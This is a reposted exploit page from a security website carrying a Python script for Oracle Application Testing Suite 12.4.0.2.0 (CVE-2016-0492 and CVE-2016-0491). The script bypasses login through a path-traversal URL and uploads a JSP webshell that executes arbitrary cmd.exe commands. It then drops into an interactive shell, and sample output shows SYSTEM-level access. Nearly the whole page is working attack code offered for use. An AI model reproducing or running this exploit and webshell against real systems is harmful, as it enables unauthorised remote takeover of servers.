首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrar 来源：504137480@qq.com 作者：Zhou Yu 发布时间：2016-04-15   # Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit # Exploit Author: Zhou Yu <504137480@qq.com > # Vendor Homepage: http://www.oracle.com/ # Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn # Version: 12.4.0.2.0 # Tested on: Win7 SP1 32-bit # CVE : CVE-2016-0492 and CVE-2016-0491   import urllib2 import urllib   ip = '192.168.150.239' port = 8088   url = "http://" + ip + ":" + str(port) #bypass authentication url = url+"/olt/Login.do/../../olt/UploadFileUpload.do" request = urllib2.Request(url)   webshell_content=''' <%@ page import="java.util.*,java.io.*"  %>     <%         if (request.getParameter("{cmd}") != null) {{             Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));             OutputStream os = p.getOutputStream();             InputStream in = p.getInputStream();             DataInputStream dis = new DataInputStream(in);             String disr = dis.readLine();             while (disr != null) {{                 out.println(disr);                 disr = dis.readLine();             }}         }}     %> ''' boundary = "---------------------------7e01e2240a1e" request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary) post_data = "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n" post_data = post_data + "\r\n.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" post_data = post_data + "\r\nwebshell.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" post_data = post_data + "\r\n*\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" post_data = post_data + "Content-Type: text/plain\r\n" post_data = post_data + "\r\n" + webshell_content +"\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" post_data = post_data + "\r\nDefault\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" post_data = post_data + "\r\n.\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" post_data = post_data + "--" + boundary + "--"+"\r\n"   try:     request.add_data(post_data)     response = urllib2.urlopen(request)     if response.code == 200 :         print "[+]upload done!"         webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"         print "[+]wait a moment,detecting whether the webshell exists..."         if urllib2.urlopen(webshellurl).code == 200 :             print "[+]upload webshell successfully!"             print "[+]return a cmd shell"             while True:                 cmd = raw_input(">>: ")                 if cmd == "exit" :                     break                 print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()         else:             print "[-]attack fail!"     else:         print "[-]attack fail!" except Exception as e:     print "[-]attack fail!"   ''' #run the exploit and get a cmd shell root@kali:~/Desktop# python exploit.py [+]upload done! [+]wait a moment,detecting whether the webshell exists... [+]upload webshell successfully! [+]return a cmd shell >>: whoami nt authority\system     >>: exit '''   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·CAM UnZip 5.1 - Archive Path T ·Texas Instrument Emulator 3.03 ·Express Zip 2.40 - Path Traver ·Dell KACE K1000 File Upload ·ExaGrid Known SSH Key / Defaul ·Internet Explorer 9, 10, 11 - ·PostgreSQL CREATE LANGUAGE Exe ·Exim perl_startup Privilege Es ·Apple Intel HD 3000 Graphics D ·Internet Explorer 11 - MSHTML! ·MESS 0.154-3.1 Buffer Overflow ·Novell ServiceDesk Authenticat   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved